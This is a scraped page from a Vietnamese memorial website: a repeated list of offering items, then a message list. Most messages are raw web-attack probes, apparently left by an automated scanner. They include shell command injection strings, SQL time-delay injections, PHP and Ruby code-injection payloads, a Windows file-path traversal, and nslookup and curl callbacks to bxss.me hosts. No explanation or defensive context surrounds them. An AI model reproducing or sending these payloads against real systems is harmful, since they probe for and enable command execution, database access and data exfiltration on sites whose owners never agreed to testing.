anh-do-cung
Củ quả xào mề chay
anh-do-cung
Gạo
anh-do-cung
Xôi chè
anh-do-cung
Oản to
anh-do-cung
Oản
anh-do-cung
Muối
anh-do-cung
Mâm xôi (5kg gạo)
anh-do-cung
Xôi đĩa nhỡ (1kg gạo)
anh-do-cung
Xôi đĩa nhỏ
anh-do-cung
Cơm trắng
anh-do-cung
Chè
anh-do-cung
Bỏng nhỏ
anh-do-cung
Lavie chai lớn
anh-do-cung
Lavie chai nhỏ
anh-do-cung
Trầu cau
anh-do-cung
Mâm trái cây lớn
anh-do-cung
Mâm trái cây nhỡ
anh-do-cung
Đĩa trái cây nhỏ
anh-do-cung
Vàng mã
anh-do-cung
Nến đôi
anh-do-cung
Đồ dùng cá nhân
anh-do-cung
Ngựa thần linh
anh-do-cung
Mũ, nhà, xe
anh-do-cung
Thuốc lá
anh-do-cung
Xe
anh-do-cung
Vịt chay
anh-do-cung
Rau củ chay
anh-do-cung
Nộm chay
anh-do-cung
Nem chay
anh-do-cung
Giò chay
anh-do-cung
Gà chay
anh-do-cung
Trứng
anh-do-cung
Tôm chiên
anh-do-cung
Thịt luộc
anh-do-cung
Rau ngũ sắc
anh-do-cung
Nem quấn
anh-do-cung
Mực chiên
anh-do-cung
Lợn quay
anh-do-cung
Giò chả
anh-do-cung
Gà quay
anh-do-cung
Gà luộc
anh-do-cung
Canh thập cẩm
anh-do-cung
Bóng xào thập cẩm
anh-do-cung
Bánh chưng
anh-do-cung
Hoa sen
anh-do-cung
Hoa ly 5 tai
anh-do-cung
Hoa ly 3 tai
anh-do-cung
Hoa huệ
anh-do-cung
Hoa hồng
anh-do-cung
Hoa cúc
anh-do-cung
Trứng
anh-do-cung
Tôm chiên
anh-do-cung
Thịt luộc
anh-do-cung
Rau ngũ sắc
anh-do-cung
Nem quấn
anh-do-cung
Mực chiên
anh-do-cung
Lợn quay
anh-do-cung
Giò chả
anh-do-cung
Gà quay
anh-do-cung
Gà luộc
anh-do-cung
Canh thập cẩm
anh-do-cung
Bóng xào thập cẩm
anh-do-cung
Bánh chưng
anh-do-cung
Củ quả xào mề chay
anh-do-cung
Vịt chay
anh-do-cung
Rau củ chay
anh-do-cung
Nộm chay
anh-do-cung
Nem chay
anh-do-cung
Giò chay
anh-do-cung
Gà chay
anh-do-cung
Trầu cau
anh-do-cung
Mâm trái cây lớn
anh-do-cung
Mâm trái cây nhỡ
anh-do-cung
Đĩa trái cây nhỏ
anh-do-cung
Vàng mã
anh-do-cung
Nến đôi
anh-do-cung
Đồ dùng cá nhân
anh-do-cung
Ngựa thần linh
anh-do-cung
Mũ, nhà, xe
anh-do-cung
Thuốc lá
anh-do-cung
Xe
anh-do-cung
Gạo
anh-do-cung
Xôi chè
anh-do-cung
Oản to
anh-do-cung
Oản
anh-do-cung
Muối
anh-do-cung
Mâm xôi (5kg gạo)
anh-do-cung
Xôi đĩa nhỡ (1kg gạo)
anh-do-cung
Xôi đĩa nhỏ
anh-do-cung
Cơm trắng
anh-do-cung
Chè
anh-do-cung
Bỏng nhỏ
anh-do-cung
Lavie chai lớn
anh-do-cung
Lavie chai nhỏ

Góc tưởng niệm

Danh sách lời nhắn

1

555

1

555

response.write(9202489*9186522)

555

echo dccrog$()\ morgwy\nz^xyu||a #' &echo dccrog$()\ morgwy\nz^xyu||a #|" &echo dccrog$()\ morgwy\nz^xyu||a #

555

1

555

1

response.write(9371431*9898015)

&echo fdwnaa$()\ uhhltj\nz^xyu||a #' &echo fdwnaa$()\ uhhltj\nz^xyu||a #|" &echo fdwnaa$()\ uhhltj\nz^xyu||a #

555

GqibmUWJ

555

1&echo igqmtp$()\ glleua\nz^xyu||a #' &echo igqmtp$()\ glleua\nz^xyu||a #|" &echo igqmtp$()\ glleua\nz^xyu||a #

555

1

1

1

555

|echo kajtja$()\ gedjzn\nz^xyu||a #' |echo kajtja$()\ gedjzn\nz^xyu||a #|" |echo kajtja$()\ gedjzn\nz^xyu||a #

555

1

V5pyDrCr

555

../1

555

1|echo idvtjn$()\ wtplwj\nz^xyu||a #' |echo idvtjn$()\ wtplwj\nz^xyu||a #|" |echo idvtjn$()\ wtplwj\nz^xyu||a #

555

1-1; waitfor delay '0:0:15' --

555

1

555

1

1

1

555

(nslookup -q=cname hitibanvjyxof8b273.bxss.me||curl hitibanvjyxof8b273.bxss.me))

555

1-1); waitfor delay '0:0:15' --

555

$(nslookup -q=cname hitvuqcbvnkqa7eb44.bxss.me||curl hitvuqcbvnkqa7eb44.bxss.me)

555

${10000240+10000304}

555

1

555

Array

555

1

../555

&nslookup -q=cname hitvezbzatbcz4cd66.bxss.me&'\"`0&nslookup -q=cname hitvezbzatbcz4cd66.bxss.me&`'

555

1i4182fjx'; waitfor delay '0:0:15' --

555

1

&(nslookup -q=cname hitznxsarfrla44ca6.bxss.me||curl hitznxsarfrla44ca6.bxss.me)&'\"`0&(nslookup -q=cname hitznxsarfrla44ca6.bxss.me||curl hitznxsarfrla44ca6.bxss.me)&`'

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555

1

${10000396+9999166}

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555

|(nslookup -q=cname hitftouzdwytad1118.bxss.me||curl hitftouzdwytad1118.bxss.me)

555

`(nslookup -q=cname hituzswtkrdnx1686e.bxss.me||curl hituzswtkrdnx1686e.bxss.me)`

555

1

Array

Http://bxss.me/t/fit.txt

555

1&n949914=v982218

555

;(nslookup -q=cname hitxwbyatqyzkbbfe0.bxss.me||curl hitxwbyatqyzkbbfe0.bxss.me)|(nslookup -q=cname hitxwbyatqyzkbbfe0.bxss.me||curl hitxwbyatqyzkbbfe0.bxss.me)&(nslookup -q=cname hitxwbyatqyzkbbfe0.bxss.me||curl hitxwbyatqyzkbbfe0.bxss.me)

555

)

555

http://bxss.me/t/fit.txt?.jpg

555

1'"

555

1

echo kyfjjr$()\ rnyfht\nz^xyu||a #' &echo kyfjjr$()\ rnyfht\nz^xyu||a #|" &echo kyfjjr$()\ rnyfht\nz^xyu||a #

1

555&n979445=v996938

!(()&&!|*|*|

555

c:/windows/win.ini

555

Array

555

bxss.me

555

^(#$!@#$)(()))******

555

1

&echo kwridx$()\ nzxnlx\nz^xyu||a #' &echo kwridx$()\ nzxnlx\nz^xyu||a #|" &echo kwridx$()\ nzxnlx\nz^xyu||a #

'.gethostbyname(lc('hiton'.'mzbvheti167ca.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(70).chr(115).chr(81).'

555

1

555

@@LwtmH

555

1

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

1

)

bxss.me/t/xss.html?%00

555

Array

555

1

555&echo sticti$()\ hdhxzc\nz^xyu||a #' &echo sticti$()\ hdhxzc\nz^xyu||a #|" &echo sticti$()\ hdhxzc\nz^xyu||a #

1

555

1

!(()&&!|*|*|

1

bxss.me/t/xss.html?%00

1

|echo vevydo$()\ fulhyi\nz^xyu||a #' |echo vevydo$()\ fulhyi\nz^xyu||a #|" |echo vevydo$()\ fulhyi\nz^xyu||a #

1

555

1

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

1

^(#$!@#$)(()))******

".gethostbyname(lc("hitba"."kjpirqhg4836c.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(70).chr(120).chr(89)."

555

1

555|echo vsnokj$()\ lpmpfy\nz^xyu||a #' |echo vsnokj$()\ lpmpfy\nz^xyu||a #|" |echo vsnokj$()\ lpmpfy\nz^xyu||a #

1

555

"+"A".concat(70-3).concat(22*4).concat(101).concat(90).concat(103).concat(79)+(require"socket" Socket.gethostbyname("hitxo"+"uapvtrip53a9b.bxss.me.")[3].to_s)+"

555

Array

555

';print(md5(31337));$a='

555

index.php

555

1

'.gethostbyname(lc('hitqo'.'fcdgnyvle5fdf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(71).chr(104).chr(81).'

1

(nslookup -q=cname hittcqjsizneo0d684.bxss.me||curl hittcqjsizneo0d684.bxss.me))

1

Http://bxss.me/t/fit.txt

1

".gethostbyname(lc("hitzr"."uznnspjt4a5ac.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(65).chr(114).chr(66)."

index.php

555

index.php/.

555

";print(md5(31337));$a="

555

1

index.php

1

$(nslookup -q=cname hitoijyfasocibf42f.bxss.me||curl hitoijyfasocibf42f.bxss.me)

${@print(md5(31337))}

555

1

index.php

1

&nslookup -q=cname hitidvkqhiymr2f5cd.bxss.me&'\"`0&nslookup -q=cname hitidvkqhiymr2f5cd.bxss.me&`'

${@print(md5(31337))}\

555

1

&(nslookup -q=cname hitmnehsjudtx190fd.bxss.me||curl hitmnehsjudtx190fd.bxss.me)&'\"`0&(nslookup -q=cname hitmnehsjudtx190fd.bxss.me||curl hitmnehsjudtx190fd.bxss.me)&`'

'.print(md5(31337)).'

555

1

|(nslookup -q=cname hitnsmwaafnay629c4.bxss.me||curl hitnsmwaafnay629c4.bxss.me)

1

index.php/.

'+'A'.concat(70-3).concat(22*4).concat(97).concat(70).concat(114).concat(69)+(require'socket' Socket.gethostbyname('hityj'+'tvpykkhg9c35e.bxss.me.')[3].to_s)+'

555

Array

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

1

http://bxss.me/t/fit.txt?.jpg

1

|(nslookup -q=cname hitnsmwaafnay629c4.bxss.me||curl hitnsmwaafnay629c4.bxss.me)

'.print(md5(31337)).'

555

1

index.php/.

xfs.bxss.me

555

1

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

'"

555

1

"+"A".concat(70-3).concat(22*4).concat(100).concat(65).concat(104).concat(67)+(require"socket" Socket.gethostbyname("hitpg"+"ifcsrmbh2affe.bxss.me.")[3].to_s)+"

xfs.bxss.me

555